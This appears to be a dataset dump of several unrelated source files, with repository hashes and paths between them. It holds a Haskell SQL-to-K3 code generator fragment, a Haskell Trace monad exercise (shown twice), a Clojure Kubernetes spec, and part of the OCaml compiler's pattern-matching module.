cgexpr subqbs f sid e@(InPredicate _ ine isIn (InQueryExpr _ _)) = do
testexpr <- cgexpr subqbs f sid ine
(subexpr, osid, bm) <- cgsubquery subqbs e
memberE isIn osid bm testexpr subexpr
cgexpr _ _ _ e = throwE $ "Unhandled expression in codegen: " ++ show e
cgcase _ _ _ _ [] = throwE $ "Invalid empty case-list in cgcase"
cgcase subqbs f sid elseexpr whens@((_,e):_) = do
elseE <- maybe (zeroSQLE (Just sid) e) (cgexpr subqbs f sid) elseexpr
foldM (cgcasebranch subqbs f sid) elseE whens
cgcasesimple _ _ _ _ _ [] = throwE $ "Invalid empty case-list in cgcasesimple"
cgcasesimple subqbs f sid expr elseexpr whens@((_, e):_) = do
valE <- cgexpr subqbs f sid expr
elseE <- maybe (zeroSQLE (Just sid) e) (cgexpr subqbs f sid) elseexpr
foldM (cgcasebrancheq subqbs f sid valE) elseE whens
cgcasebranch subqbs f sid elseE (l,e) = do
predE <- case l of
[] -> throwE "Invalid case-branch-list"
[x] -> cgexpr subqbs Nothing sid x
h:t -> cgexpr subqbs Nothing sid h >>= \hE -> foldM (cgconjunct subqbs sid) hE t
thenE <- cgexpr subqbs f sid e
return $ EC.ifThenElse predE thenE elseE
cgcasebrancheq subqbs f sid valE elseE (l,e) = do
testValE <- case l of
[x] -> cgexpr subqbs Nothing sid x
_ -> throwE "Invalid case-branch-eq-list"
thenE <- cgexpr subqbs f sid e
return $ EC.ifThenElse (EC.binop OEqu valE testValE) thenE elseE
cgsubquery subqbs e =
case lookup e subqbs of
Nothing -> throwE $ "Found a subquery without a binding: " ++ show e
Just (_, qcl) -> cgclosure qcl >>= \(r, osid, bm, _) -> return (r, osid, bm)
bindingMap l = foldM qualifyBindings (BMTVPartition Map.empty) l
qualifyBindings (BMTVPartition acc) (qual, Just aenv, bm) = do
f <- case bm of
BMNone -> return $ commonNoneBinding qual
BMTPrefix i -> return $ commonPrefixBinding qual i
BMTFieldMap fb -> return $ commonFieldBinding qual fb
_ -> throwE "Cannot qualify partitioned bindings"
return $ BMTVPartition $ Map.foldlWithKey f acc aenv
qualifyBindings _ _ = throwE "Cannot qualify partitioned bindings"
commonNoneBinding qual acc path _ = case path of
[i] -> Map.insert i (qual, Nothing) acc
_ -> acc
commonPrefixBinding qual pfx acc path _ = case path of
[i] -> Map.insert i (qual, Just $ Left pfx) acc
_ -> acc
commonFieldBinding qual fb acc path _ = case path of
[i] -> maybe acc (\typePath -> Map.insert i (qual, Just $ Right typePath) acc) $ Map.lookup i fb
_ -> acc
filterChainE :: ScopeId -> BindingMap -> SubqueryBindings -> K3 Expression -> ScalarExpr -> SQLParseM (K3 Expression)
filterChainE sid bm subqbs eacc e = do
i <- uniqueScopeQualifier sid
filterE <- cgexpr subqbs Nothing sid e
bodyE <- bindE sid bm (Just i) filterE
return $ EC.applyMany (EC.project "filter" eacc) [EC.lambda i bodyE]
annotateTriggerBody i (QueryPlan tOpt chains _) mergeOpt e = do
if distributed
then case tOpt of
Just (isEquiJoin -> True) ->
return $ e @+ (EApplyGen True "DistributedHashJoin2" $ Map.fromList [("lbl", SLabel i)])
Just (isJoin -> True) ->
return $ e @+ (EApplyGen True "BroadcastJoin2" $ Map.fromList [("lbl", SLabel i)])
Just (treeChains -> Just chains) | not (null chains) && isGroupByAggregatePath (last chains) ->
case mergeOpt of
Just mergeF -> return $ e @+ (EApplyGen True "DistributedGroupBy2"
$ Map.fromList [("lbl", SLabel i), ("merge", SExpr mergeF)])
Nothing -> throwE "No merge function found for group-by stage"
_ -> return e
else maybe (return e) (const $ joinBarrier e) $ Map.lookup i stagechildren
joinBarrier e = mkCountBarrier e $ EC.constant $ CInt 2
mkCountBarrier e countE = do
args <- barrierArgs countE
return $ e @+ EApplyGen True "OnCounter" args
barrierArgs countE = do
lblsym <- slblsextM
return $ Map.fromList [ ("id", SLabel $ "barrier" ++ show lblsym)
, ("eq", SExpr $ countE)
, ("reset", SExpr $ EC.constant $ CBool False)
, ("profile", SExpr $ EC.constant $ CBool False) ]
master = DC.global "master" (immutT TC.address) Nothing
mkLoader (i,t) = do
dt <- twrapcolelemM t
let pathCT = (TC.collection $ recT [("path", TC.string)]) @+ TAnnotation "Collection"
let rexpr = EC.applyMany (EC.variable $ i ++ "LoaderE") [EC.variable $ i ++ "Files", EC.variable i]
return $
([(DC.global (i ++ "LoaderE") (immutT $ TC.function pathCT $ TC.function dt TC.unit) Nothing) @+ cArgsProp 2,
DC.global (i ++ "Files") (immutT pathCT) Nothing],
rexpr)
mkPeerInit exprs =
[DC.trigger "startPeer" TC.unit $ EC.lambda "_" $
EC.block $ exprs ++ [EC.send (EC.variable "start") (EC.variable $ if distributed then "master" else "me") EC.unit]]
mkInit decls = do
sendsE <- if distributed then
let startE = EC.block $ flip map stageinits $ \i ->
EC.applyMany (EC.project "iterate" $ EC.variable "peers")
[EC.lambda "p" $ EC.send (EC.variable $ trig i) (EC.project "addr" $ EC.variable "p") EC.unit]
in mkCountBarrier startE $ EC.applyMany (EC.project "size" $ EC.variable "peers") [EC.unit]
else return $ EC.block $ map (\i -> EC.send (EC.variable i) (EC.variable "me") EC.unit) $ foldl declTriggers [] decls
return $ [DC.trigger "start" TC.unit $ EC.lambda "_" $
EC.block $ [EC.unit @+ EApplyGen True "SQL" Map.empty, sendsE]]
declTriggers acc (tag -> DTrigger i _ _) = acc ++ [i]
declTriggers acc _ = acc
sqlstringify :: [SQLDecl] -> SQLParseM [String]
sqlstringify stmts = mapM prettystmt stmts
where prettystmt (SQLRel (i, t)) = return $ boxToString $ [unwords ["Table:", i]] %$ prettyLines t
prettystmt (SQLStage (i, t)) = return $ boxToString $ [unwords ["Stage:", i]] %$ prettyLines t
prettystmt (SQLQuery plan) = return $ boxToString $ ["Plan: "] %$ prettyLines plan
sqldepgraph :: [SQLDecl] -> SQLParseM [String]
sqldepgraph stmts = mapM depgraph stmts >>= return . concat
where depgraph (SQLRel _) = return []
depgraph (SQLStage _) = return []
depgraph (SQLQuery (QueryPlan Nothing [] _)) = return []
depgraph (SQLQuery (QueryPlan Nothing chains _)) = chaseScope $ pcoutsid $ last chains
depgraph (SQLQuery (QueryPlan (Just t) chains _)) = treeSchema t >>= \sid -> chaseScope $ chainSchema sid chains
chaseScope sid = do
sf <- sqclkupM sid
ptrs <- sqcfptrsM sid
nodes <- mapM (adgchaseNodesM []) ptrs >>= return . nub . concat
return $ [unwords ["Scope", show sid, show sf, show ptrs]] ++ (indent 2 $ adgnodes nodes)
adgnodes nodes = map (\(p,node) -> unwords [show p, show $ adnn node, show $ adnr node, show $ adnch node])
$ sortBy (compare `on` fst) nodes
projectPathE :: K3 Expression -> [Identifier] -> K3 Expression
projectPathE e p = foldl (\accE i -> EC.project i accE) e p
fieldE :: TypeMapping -> Identifier -> K3 Expression -> K3 Expression
fieldE Nothing _ e = e
fieldE (Just (Left pfx)) i e = EC.project i $ EC.project pfx e
fieldE (Just (Right tp)) _ e = projectPathE e tp
namedRecordE :: Identifier -> Map Identifier TypePath -> [Identifier] -> SQLParseM (K3 Expression)
namedRecordE i fb ids = foldM field [] ids >>= return . recE
where field acc j = maybe (err j) (\tp -> return $ acc ++ [(j, projectPathE (EC.variable i) tp)]) $ Map.lookup j fb
err j = throwE $ "No field binding found in namedRecordE for " ++ show j
compositeRecordE :: Map Identifier (Identifier, TypeMapping) -> [Identifier] -> SQLParseM (K3 Expression)
compositeRecordE pb ids = foldM field [] ids >>= return . recE
where field acc i = maybe (err i) (\(v, tm) -> return $ acc ++ [(i, fieldE tm i $ EC.variable v)]) $ Map.lookup i pb
err i = throwE $ "No field binding found in compositeRecordE for " ++ show i
bindE :: ScopeId -> BindingMap -> Maybe Identifier -> K3 Expression -> SQLParseM (K3 Expression)
bindE sid bm iOpt e = do
ids <- sqclkupM sid >>= unqualifiedAttrs
case (iOpt, bm) of
(Just i, BMNone) -> return $ EC.bindAs (EC.variable i) (BRecord $ zip ids ids) e
(Just i, BMTPrefix j) -> return $ EC.bindAs (EC.project j $ EC.variable i) (BRecord $ zip ids ids) e
(Just i, BMTFieldMap fb) -> do
initE <- namedRecordE i fb ids
return $ EC.bindAs initE (BRecord $ zip ids ids) e
(_, BMTVPartition pb) -> do
initE <- compositeRecordE pb ids
return $ EC.bindAs initE (BRecord $ zip ids ids) e
_ -> throwE "Invalid binding variable in bindE"
concatE :: ScopeId -> BindingMap -> Maybe Identifier -> SQLParseM (K3 Expression)
concatE sid bm iOpt = do
ids <- sqclkupM sid >>= unqualifiedAttrs
case (iOpt, bm) of
(Just i, BMNone) -> return $ EC.variable i
(Just i, BMTPrefix j) -> return $ EC.project j $ EC.variable i
(Just i, BMTFieldMap fb) -> namedRecordE i fb ids
(_, BMTVPartition pb) -> compositeRecordE pb ids
_ -> throwE "Invalid binding variable in concatE"
aggE :: Identifier -> (Identifier, K3 Expression) -> (Identifier, K3 Expression)
aggE i (f, e) = (f, EC.applyMany e [EC.project f $ EC.variable i])
aggMergeE :: Identifier -> Identifier -> (Identifier, K3 Expression) -> (Identifier, K3 Expression)
aggMergeE i j (f, mergeF) = (f, EC.applyMany mergeF [EC.project f $ EC.variable i, EC.project f $ EC.variable j])
zeroE :: [(Identifier, K3 Type)] -> SQLParseM (K3 Expression)
zeroE [] = return EC.unit
zeroE [(_,t)] = either throwE return $ defaultExpression t
zeroE l = either throwE return $ defaultExpression $ recT l
zeroT :: [(Identifier, K3 Type)] -> SQLParseM (K3 Type)
zeroT [] = return TC.unit
zeroT [(_,t)] = return t
zeroT l = return $ recT l
zeroSQLE :: Maybe ScopeId -> ScalarExpr -> SQLParseM (K3 Expression)
zeroSQLE sidOpt e = scalarexprType sidOpt e >>= \t -> either throwE return $ defaultExpression t
TODO :
memoE :: K3 Expression -> (K3 Expression -> SQLParseM (K3 Expression)) -> SQLParseM (K3 Expression)
memoE srcE bodyF = case tag srcE of
EConstant _ -> bodyF srcE
EVariable _ -> bodyF srcE
_ -> do { be <- bodyF $ EC.variable "__memo";
return $ EC.letIn "__memo" (immutE srcE) $ be }
matchE :: ScopeId -> BindingMap -> K3 Expression -> K3 Expression -> SQLParseM (K3 Expression)
matchE sid bm elemexpr colexpr = do
ids <- sqclkupM sid >>= unqualifiedAttrs
targetE <- matchTargetE ids
memoE (immutE elemexpr) $ \e -> do
bodyE <- bindE sid bm (Just "__x") $ EC.binop OEqu targetE e
return $ EC.applyMany (EC.project "filter" $ colexpr) [EC.lambda "__x" bodyE]
where matchTargetE [x] = return $ EC.variable x
matchTargetE l = throwE $ "Invalid match targets: " ++ show l
memberE :: Bool -> ScopeId -> BindingMap -> K3 Expression -> K3 Expression -> SQLParseM (K3 Expression)
memberE asMem sid bm elemexpr colexpr = matchE sid bm elemexpr colexpr >>= emptyE (not asMem)
emptyE :: Bool -> K3 Expression -> SQLParseM (K3 Expression)
emptyE asEmpty colexpr = return $
EC.binop (if asEmpty then OEqu else ONeq)
(EC.applyMany (EC.project "size" colexpr) [EC.unit]) $ EC.constant $ CInt 0
cArgsProp :: Int -> Annotation Declaration
cArgsProp i = DProperty $ Left ("CArgs", Just $ LC.int i)
prettyList :: (Pretty a) => [a] -> [String]
prettyList [] = []
prettyList [x] = "|" : (shift "`- " " " $ prettyLines x)
prettyList l = "|" : (concatMap (\x -> shift "+- " "| " $ prettyLines x) (init l)
++ ["|"] ++ (shift "`- " " " $ prettyLines $ last l))
instance Pretty (Tree PlanNode) where
prettyLines (Node (PJoin psid osid jt jeq jp _ chains) ch) =
[unwords ["Join", show psid, show osid, show jt, "equalities", show $ length jeq, "preds", show $ length jp]]
++ prettyList chains ++ drawSubTrees ch
prettyLines (Node (PTable n sid _ _ chains) _) =
[unwords ["Table", n, show sid]] ++ prettyList chains
prettyLines (Node (PSubquery _ qcl) _) = ["Subquery", "|"] ++ (shift "`- " " " $ prettyLines qcl)
instance Pretty QueryClosure where
prettyLines (QueryClosure _ plan) = ["QueryClosure", "|"] ++ (shift "`- " " " $ prettyLines plan)
instance Pretty QueryPlan where
prettyLines (QueryPlan treeOpt chains stgOpt) =
["QueryPlan " ++ maybe "" id stgOpt] ++ (maybe [] treeF treeOpt) ++ prettyList chains
where treeF t = if null chains then "|" : (shift "`- " " " $ prettyLines t)
else "|" : (shift "+- " "| " $ prettyLines t)
instance Pretty PlanCPath where
prettyLines (PlanCPath sid selects gbs prjs aggs having _) =
[unwords ["PlanCPath", show sid
, "sels", show $ length selects
, "gbys", show $ length gbs
, "prjs", show $ length prjs
, "aggs", show $ length aggs
, maybe "<no having>" (const "having") having]]
|
34c668e981e3ae5fe914409a8461d672856b10e2c29da77fc3d02707bc169bb7 | raviksharma/bartosz-basics-of-haskell | trace.hs | Ex 2 . Define a monad instance for Trace ( no need to override fail ) . The idea is to create a trace of execution by sprinkling you code with calls to put . The result of executing this code should look something like this :
--
-- ["fact 3","fact 2","fact 1","fact 0"]
6
Hint : List concatenation is done using + + ( we 've seen it used for string concatenation , because is just a list of ) .
import Control.Applicative
import Control.Monad (liftM, ap)
newtype Trace a = Trace ([String], a)
instance Functor Trace where
fmap = liftM
instance Applicative Trace where
pure = return
(<*>) = ap
instance Monad Trace where
return x = Trace ([], x)
(Trace (lst, x)) >>= k =
let Trace (lst', y) = k x
in Trace (lst ++ lst', y)
put :: Show a => String -> a -> Trace ()
put msg v = Trace ([msg ++ " " ++ show v], ())
fact :: Integer -> Trace Integer
fact n = do
put "fact" n
if n == 0
then return 1
else do
m <- fact (n - 1)
return (n * m)
main = let Trace (lst, m) = fact 3
in do
print lst
print m
| null | https://raw.githubusercontent.com/raviksharma/bartosz-basics-of-haskell/86d40d831f61415ef0022bff7fe7060ae6a23701/10-error-handling/trace.hs | haskell |
["fact 3","fact 2","fact 1","fact 0"] | Ex 2 . Define a monad instance for Trace ( no need to override fail ) . The idea is to create a trace of execution by sprinkling you code with calls to put . The result of executing this code should look something like this :
6
Hint : List concatenation is done using + + ( we 've seen it used for string concatenation , because is just a list of ) .
import Control.Applicative
import Control.Monad (liftM, ap)
newtype Trace a = Trace ([String], a)
instance Functor Trace where
fmap = liftM
instance Applicative Trace where
pure = return
(<*>) = ap
instance Monad Trace where
return x = Trace ([], x)
(Trace (lst, x)) >>= k =
let Trace (lst', y) = k x
in Trace (lst ++ lst', y)
put :: Show a => String -> a -> Trace ()
put msg v = Trace ([msg ++ " " ++ show v], ())
fact :: Integer -> Trace Integer
fact n = do
put "fact" n
if n == 0
then return 1
else do
m <- fact (n - 1)
return (n * m)
main = let Trace (lst, m) = fact 3
in do
print lst
print m
|
d4875e90bab521ec63499378715fb0129e01aad79ec896d9aadb0a1e86f2f5a4 | exoscale/clojure-kubernetes-client | v1_subject_access_review_status.clj | (ns clojure-kubernetes-client.specs.v1-subject-access-review-status
(:require [clojure.spec.alpha :as s]
[spec-tools.data-spec :as ds]
)
(:import (java.io File)))
(declare v1-subject-access-review-status-data v1-subject-access-review-status)
(def v1-subject-access-review-status-data
{
(ds/req :allowed) boolean?
(ds/opt :denied) boolean?
(ds/opt :evaluationError) string?
(ds/opt :reason) string?
})
(def v1-subject-access-review-status
(ds/spec
{:name ::v1-subject-access-review-status
:spec v1-subject-access-review-status-data}))
| null | https://raw.githubusercontent.com/exoscale/clojure-kubernetes-client/79d84417f28d048c5ac015c17e3926c73e6ac668/src/clojure_kubernetes_client/specs/v1_subject_access_review_status.clj | clojure | (ns clojure-kubernetes-client.specs.v1-subject-access-review-status
(:require [clojure.spec.alpha :as s]
[spec-tools.data-spec :as ds]
)
(:import (java.io File)))
(declare v1-subject-access-review-status-data v1-subject-access-review-status)
(def v1-subject-access-review-status-data
{
(ds/req :allowed) boolean?
(ds/opt :denied) boolean?
(ds/opt :evaluationError) string?
(ds/opt :reason) string?
})
(def v1-subject-access-review-status
(ds/spec
{:name ::v1-subject-access-review-status
:spec v1-subject-access-review-status-data}))
| |
456354bb4627b97c76c0743f4dbbe0f9526efaab0e1578251c24443d7ea69199 | rescript-lang/rescript-compiler | matching.ml | (**************************************************************************)
(* *)
(* OCaml *)
(* *)
, projet Cristal , INRIA Rocquencourt
(* *)
Copyright 1996 Institut National de Recherche en Informatique et
(* en Automatique. *)
(* *)
(* All rights reserved. This file is distributed under the terms of *)
the GNU Lesser General Public License version 2.1 , with the
(* special exception on linking described in the file LICENSE. *)
(* *)
(**************************************************************************)
(* Compilation of pattern matching *)
open Misc
open Asttypes
open Types
open Typedtree
open Lambda
open Parmatch
open Printf
let dbg = false
See Peyton - Jones , ` ` The Implementation of functional programming
languages '' , chapter 5 .
languages'', chapter 5. *)
Well , it was true at the beginning of the world .
Now , see Lefessant - Maranget ` ` Optimizing Pattern - Matching '' ICFP'2001
Well, it was true at the beginning of the world.
Now, see Lefessant-Maranget ``Optimizing Pattern-Matching'' ICFP'2001
*)
Compatibility predicate that considers potential rebindings of constructors
of an extension type .
" may_compat p q " returns false when p and q never admit a common instance ;
returns true when they may have a common instance .
Compatibility predicate that considers potential rebindings of constructors
of an extension type.
"may_compat p q" returns false when p and q never admit a common instance;
returns true when they may have a common instance.
*)
module MayCompat =
Parmatch.Compat (struct let equal = Types.may_equal_constr end)
let may_compat = MayCompat.compat
and may_compats = MayCompat.compats
(*
Many functions on the various data structures of the algorithm :
- Pattern matrices.
- Default environments: mapping from matrices to exit numbers.
- Contexts: matrices whose column are partitioned into
left and right.
- Jump summaries: mapping from exit numbers to contexts
*)
let string_of_lam lam =
Printlambda.lambda Format.str_formatter lam ;
Format.flush_str_formatter ()
type matrix = pattern list list
let add_omega_column pss = List.map (fun ps -> omega::ps) pss
type ctx = {left:pattern list ; right:pattern list}
let pretty_ctx ctx =
List.iter
(fun {left=left ; right=right} ->
prerr_string "LEFT:" ;
pretty_line left ;
prerr_string " RIGHT:" ;
pretty_line right ;
prerr_endline "")
ctx
let le_ctx c1 c2 =
le_pats c1.left c2.left &&
le_pats c1.right c2.right
let lshift {left=left ; right=right} = match right with
| x::xs -> {left=x::left ; right=xs}
| _ -> assert false
let lforget {left=left ; right=right} = match right with
| _::xs -> {left=omega::left ; right=xs}
| _ -> assert false
let rec small_enough n = function
| [] -> true
| _::rem ->
if n <= 0 then false
else small_enough (n-1) rem
let ctx_lshift ctx =
if small_enough 31 ctx then
List.map lshift ctx
else (* Context pruning *) begin
get_mins le_ctx (List.map lforget ctx)
end
let rshift {left=left ; right=right} = match left with
| p::ps -> {left=ps ; right=p::right}
| _ -> assert false
let ctx_rshift ctx = List.map rshift ctx
let rec nchars n ps =
if n <= 0 then [],ps
else match ps with
| p::rem ->
let chars, cdrs = nchars (n-1) rem in
p::chars,cdrs
| _ -> assert false
let rshift_num n {left=left ; right=right} =
let shifted,left = nchars n left in
{left=left ; right = shifted@right}
let ctx_rshift_num n ctx = List.map (rshift_num n) ctx
Recombination of contexts ( eg : ( _ , _ ): : p1::p2::rem - > ( )
All mutable fields are replaced by ' _ ' , since side - effects in
guards can alter these fields
All mutable fields are replaced by '_', since side-effects in
guards can alter these fields *)
let combine {left=left ; right=right} = match left with
| p::ps -> {left=ps ; right=set_args_erase_mutable p right}
| _ -> assert false
let ctx_combine ctx = List.map combine ctx
let ncols = function
| [] -> 0
| ps::_ -> List.length ps
exception NoMatch
exception OrPat
let filter_matrix matcher pss =
let rec filter_rec = function
| (p::ps)::rem ->
begin match p.pat_desc with
| Tpat_alias (p,_,_) ->
filter_rec ((p::ps)::rem)
| Tpat_var _ ->
filter_rec ((omega::ps)::rem)
| _ ->
begin
let rem = filter_rec rem in
try
matcher p ps::rem
with
| NoMatch -> rem
| OrPat ->
match p.pat_desc with
| Tpat_or (p1,p2,_) -> filter_rec [(p1::ps) ;(p2::ps)]@rem
| _ -> assert false
end
end
| [] -> []
| _ ->
pretty_matrix pss ;
fatal_error "Matching.filter_matrix" in
filter_rec pss
let make_default matcher env =
let rec make_rec = function
| [] -> []
| ([[]],i)::_ -> [[[]],i]
| (pss,i)::rem ->
let rem = make_rec rem in
match filter_matrix matcher pss with
| [] -> rem
| ([]::_) -> ([[]],i)::rem
| pss -> (pss,i)::rem in
make_rec env
let ctx_matcher p =
let p = normalize_pat p in
match p.pat_desc with
| Tpat_construct (_, cstr,omegas) ->
(fun q rem -> match q.pat_desc with
| Tpat_construct (_, cstr',args)
NB : may_constr_equal considers ( potential ) constructor rebinding
when Types.may_equal_constr cstr cstr' ->
p,args@rem
| Tpat_any -> p,omegas @ rem
| _ -> raise NoMatch)
| Tpat_constant cst ->
(fun q rem -> match q.pat_desc with
| Tpat_constant cst' when const_compare cst cst' = 0 ->
p,rem
| Tpat_any -> p,rem
| _ -> raise NoMatch)
| Tpat_variant (lab,Some omega,_) ->
(fun q rem -> match q.pat_desc with
| Tpat_variant (lab',Some arg,_) when lab=lab' ->
p,arg::rem
| Tpat_any -> p,omega::rem
| _ -> raise NoMatch)
| Tpat_variant (lab,None,_) ->
(fun q rem -> match q.pat_desc with
| Tpat_variant (lab',None,_) when lab=lab' ->
p,rem
| Tpat_any -> p,rem
| _ -> raise NoMatch)
| Tpat_array omegas ->
let len = List.length omegas in
(fun q rem -> match q.pat_desc with
| Tpat_array args when List.length args = len -> p,args @ rem
| Tpat_any -> p, omegas @ rem
| _ -> raise NoMatch)
| Tpat_tuple omegas ->
let len = List.length omegas in
(fun q rem -> match q.pat_desc with
| Tpat_tuple args when List.length args = len -> p,args @ rem
| Tpat_any -> p, omegas @ rem
| _ -> raise NoMatch)
Records are normalized
let len = Array.length lbl.lbl_all in
(fun q rem -> match q.pat_desc with
| Tpat_record (((_, lbl', _) :: _) as l',_)
when Array.length lbl'.lbl_all = len ->
let l' = all_record_args l' in
p, List.fold_right (fun (_, _,p) r -> p::r) l' rem
| Tpat_any -> p,List.fold_right (fun (_, _,p) r -> p::r) l rem
| _ -> raise NoMatch)
| Tpat_lazy omega ->
(fun q rem -> match q.pat_desc with
| Tpat_lazy arg -> p, (arg::rem)
| Tpat_any -> p, (omega::rem)
| _ -> raise NoMatch)
| _ -> fatal_error "Matching.ctx_matcher"
let filter_ctx q ctx =
let matcher = ctx_matcher q in
let rec filter_rec = function
| ({right=p::ps} as l)::rem ->
begin match p.pat_desc with
| Tpat_or (p1,p2,_) ->
filter_rec ({l with right=p1::ps}::{l with right=p2::ps}::rem)
| Tpat_alias (p,_,_) ->
filter_rec ({l with right=p::ps}::rem)
| Tpat_var _ ->
filter_rec ({l with right=omega::ps}::rem)
| _ ->
begin let rem = filter_rec rem in
try
let to_left, right = matcher p ps in
{left=to_left::l.left ; right=right}::rem
with
| NoMatch -> rem
end
end
| [] -> []
| _ -> fatal_error "Matching.filter_ctx" in
filter_rec ctx
let select_columns pss ctx =
let n = ncols pss in
List.fold_right
(fun ps r ->
List.fold_right
(fun {left=left ; right=right} r ->
let transfert, right = nchars n right in
try
{left = lubs transfert ps @ left ; right=right}::r
with
| Empty -> r)
ctx r)
pss []
let ctx_lub p ctx =
List.fold_right
(fun {left=left ; right=right} r ->
match right with
| q::rem ->
begin try
{left=left ; right = lub p q::rem}::r
with
| Empty -> r
end
| _ -> fatal_error "Matching.ctx_lub")
ctx []
let ctx_match ctx pss =
List.exists
(fun {right=qs} -> List.exists (fun ps -> may_compats qs ps) pss)
ctx
type jumps = (int * ctx list) list
let pretty_jumps (env : jumps) = match env with
| [] -> ()
| _ ->
List.iter
(fun (i,ctx) ->
Printf.fprintf stderr "jump for %d\n" i ;
pretty_ctx ctx)
env
let rec jumps_extract (i : int) = function
| [] -> [],[]
| (j,pss) as x::rem as all ->
if i=j then pss,rem
else if j < i then [],all
else
let r,rem = jumps_extract i rem in
r,(x::rem)
let rec jumps_remove (i:int) = function
| [] -> []
| (j,_)::rem when i=j -> rem
| x::rem -> x::jumps_remove i rem
let jumps_empty = []
and jumps_is_empty = function
| [] -> true
| _ -> false
let jumps_singleton i = function
| [] -> []
| ctx -> [i,ctx]
let jumps_add i pss jumps = match pss with
| [] -> jumps
| _ ->
let rec add = function
| [] -> [i,pss]
| (j,qss) as x::rem as all ->
if (j:int) > i then x::add rem
else if j < i then (i,pss)::all
else (i,(get_mins le_ctx (pss@qss)))::rem in
add jumps
let rec jumps_union (env1:(int*ctx list)list) env2 = match env1,env2 with
| [],_ -> env2
| _,[] -> env1
| ((i1,pss1) as x1::rem1), ((i2,pss2) as x2::rem2) ->
if i1=i2 then
(i1,get_mins le_ctx (pss1@pss2))::jumps_union rem1 rem2
else if i1 > i2 then
x1::jumps_union rem1 env2
else
x2::jumps_union env1 rem2
let rec merge = function
| env1::env2::rem -> jumps_union env1 env2::merge rem
| envs -> envs
let rec jumps_unions envs = match envs with
| [] -> []
| [env] -> env
| _ -> jumps_unions (merge envs)
let jumps_map f env =
List.map
(fun (i,pss) -> i,f pss)
env
(* Pattern matching before any compilation *)
type pattern_matching =
{ mutable cases : (pattern list * lambda) list;
args : (lambda * let_kind) list ;
default : (matrix * int) list}
(* Pattern matching after application of both the or-pat rule and the
mixture rule *)
type pm_or_compiled =
{body : pattern_matching ;
handlers : (matrix * int * Ident.t list * pattern_matching) list ;
or_matrix : matrix ; }
type pm_half_compiled =
| PmOr of pm_or_compiled
| PmVar of pm_var_compiled
| Pm of pattern_matching
and pm_var_compiled =
{inside : pm_half_compiled ; var_arg : lambda ; }
type pm_half_compiled_info =
{me : pm_half_compiled ;
matrix : matrix ;
top_default : (matrix * int) list ; }
let pretty_cases cases =
List.iter
(fun (ps,_l) ->
List.iter
(fun p ->
Parmatch.top_pretty Format.str_formatter p ;
prerr_string " " ;
prerr_string (Format.flush_str_formatter ()))
ps ;
(*
prerr_string " -> " ;
Printlambda.lambda Format.str_formatter l ;
prerr_string (Format.flush_str_formatter ()) ;
*)
prerr_endline "")
cases
let pretty_def def =
prerr_endline "+++++ Defaults +++++" ;
List.iter
(fun (pss,i) ->
Printf.fprintf stderr "Matrix for %d\n" i ;
pretty_matrix pss)
def ;
prerr_endline "+++++++++++++++++++++"
let pretty_pm pm =
pretty_cases pm.cases ;
if pm.default <> [] then
pretty_def pm.default
let rec pretty_precompiled = function
| Pm pm ->
prerr_endline "++++ PM ++++" ;
pretty_pm pm
| PmVar x ->
prerr_endline "++++ VAR ++++" ;
pretty_precompiled x.inside
| PmOr x ->
prerr_endline "++++ OR ++++" ;
pretty_pm x.body ;
pretty_matrix x.or_matrix ;
List.iter
(fun (_,i,_,pm) ->
eprintf "++ Handler %d ++\n" i ;
pretty_pm pm)
x.handlers
let pretty_precompiled_res first nexts =
pretty_precompiled first ;
List.iter
(fun (e, pmh) ->
eprintf "** DEFAULT %d **\n" e ;
pretty_precompiled pmh)
nexts
(* Identifying some semantically equivalent lambda-expressions,
Our goal here is also to
find alpha-equivalent (simple) terms *)
However , as shown by such sharing may hinders the
lambda - code invariant that all bound idents are unique ,
when switches are compiled to test sequences .
The definitive fix is the systematic introduction of exit / catch
in case action sharing is present .
lambda-code invariant that all bound idents are unique,
when switches are compiled to test sequences.
The definitive fix is the systematic introduction of exit/catch
in case action sharing is present.
*)
module StoreExp =
Switch.Store
(struct
type t = lambda
type key = lambda
let compare_key = compare
let make_key = Lambda.make_key
end)
let make_exit i = Lstaticraise (i,[])
(* Introduce a catch, if worth it *)
let make_catch d k = match d with
| Lstaticraise (_,[]) -> k d
| _ ->
let e = next_raise_count () in
Lstaticcatch (k (make_exit e),(e,[]),d)
(* Introduce a catch, if worth it, delayed version *)
let rec as_simple_exit = function
| Lstaticraise (i,[]) -> Some i
| Llet (Alias,_k,_,_,e) -> as_simple_exit e
| _ -> None
let make_catch_delayed handler = match as_simple_exit handler with
| Some i -> i,(fun act -> act)
| None ->
let i = next_raise_count () in
Printf.eprintf " SHARE LAMBDA : % i\n%s\n " i ( string_of_lam handler ) ;
Printf.eprintf "SHARE LAMBDA: %i\n%s\n" i (string_of_lam handler);
*)
i,
(fun body -> match body with
| Lstaticraise (j,_) ->
if i=j then handler else body
| _ -> Lstaticcatch (body,(i,[]),handler))
let raw_action l =
match make_key l with | Some l -> l | None -> l
let tr_raw act = match make_key act with
| Some act -> act
| None -> raise Exit
let same_actions = function
| [] -> None
| [_,act] -> Some act
| (_,act0) :: rem ->
try
let raw_act0 = tr_raw act0 in
let rec s_rec = function
| [] -> Some act0
| (_,act)::rem ->
if raw_act0 = tr_raw act then
s_rec rem
else
None in
s_rec rem
with
| Exit -> None
Test for swapping two clauses
let up_ok_action act1 act2 =
try
let raw1 = tr_raw act1
and raw2 = tr_raw act2 in
raw1 = raw2
with
| Exit -> false
let up_ok (ps,act_p) l =
List.for_all
(fun (qs,act_q) ->
up_ok_action act_p act_q || not (may_compats ps qs))
l
The simplify function normalizes the first column of the match
- records are expanded so that they possess all fields
- aliases are removed and replaced by bindings in actions .
However or - patterns are simplified differently ,
- aliases are not removed
- or - patterns ( _ |p ) are changed into _
The simplify function normalizes the first column of the match
- records are expanded so that they possess all fields
- aliases are removed and replaced by bindings in actions.
However or-patterns are simplified differently,
- aliases are not removed
- or-patterns (_|p) are changed into _
*)
exception Var of pattern
let simplify_or p =
let rec simpl_rec p = match p with
| {pat_desc = Tpat_any|Tpat_var _} -> raise (Var p)
| {pat_desc = Tpat_alias (q,id,s)} ->
begin try
{p with pat_desc = Tpat_alias (simpl_rec q,id,s)}
with
| Var q -> raise (Var {p with pat_desc = Tpat_alias (q,id,s)})
end
| {pat_desc = Tpat_or (p1,p2,o)} ->
let q1 = simpl_rec p1 in
begin try
let q2 = simpl_rec p2 in
{p with pat_desc = Tpat_or (q1, q2, o)}
with
| Var q2 -> raise (Var {p with pat_desc = Tpat_or (q1, q2, o)})
end
| {pat_desc = Tpat_record (lbls,closed)} ->
let all_lbls = all_record_args lbls in
{p with pat_desc=Tpat_record (all_lbls, closed)}
| _ -> p in
try
simpl_rec p
with
| Var p -> p
